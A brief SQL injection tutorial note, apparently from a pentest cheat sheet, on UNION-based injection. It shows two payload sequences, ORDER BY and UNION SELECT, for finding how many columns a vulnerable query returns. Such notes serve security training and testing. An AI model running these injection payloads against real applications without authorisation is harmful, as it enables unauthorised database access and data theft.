SQLi

Inject values using UNION

When the query is used to display entries (e.g. list of objects), values can be added with a UNION.
. First, you need to identify the number of entries used by SELECT:

SELECT id, name, desc, price FROM stock WHERE name=[NAME]

Methode 1: ORDER BY

SELECT id, name, desc, price FROM stock WHERE name='mouse' order by 1-- - : Ok
SELECT id, name, desc, price FROM stock WHERE name='mouse' order by 2-- - : Ok
SELECT id, name, desc, price FROM stock WHERE name='mouse' order by 3-- - : Ok
SELECT id, name, desc, price FROM stock WHERE name='mouse' order by 4-- - : Ok
SELECT id, name, desc, price FROM stock WHERE name='mouse' order by 5-- - : Error
=> 4 entries

Methode 2: SELECT

SELECT id, name, desc, price FROM stock WHERE name='mouse' UNION SELECT 1 : Error
SELECT id, name, desc, price FROM stock WHERE name='mouse' UNION SELECT 1,2 : Error
SELECT id, name, desc, price FROM stock WHERE name='mouse' UNION SELECT 1,2,3 : Error
SELECT id, name, desc, price FROM stock WHERE name='mouse' UNION SELECT 1,2,3,4 : Ok
=> 4 entries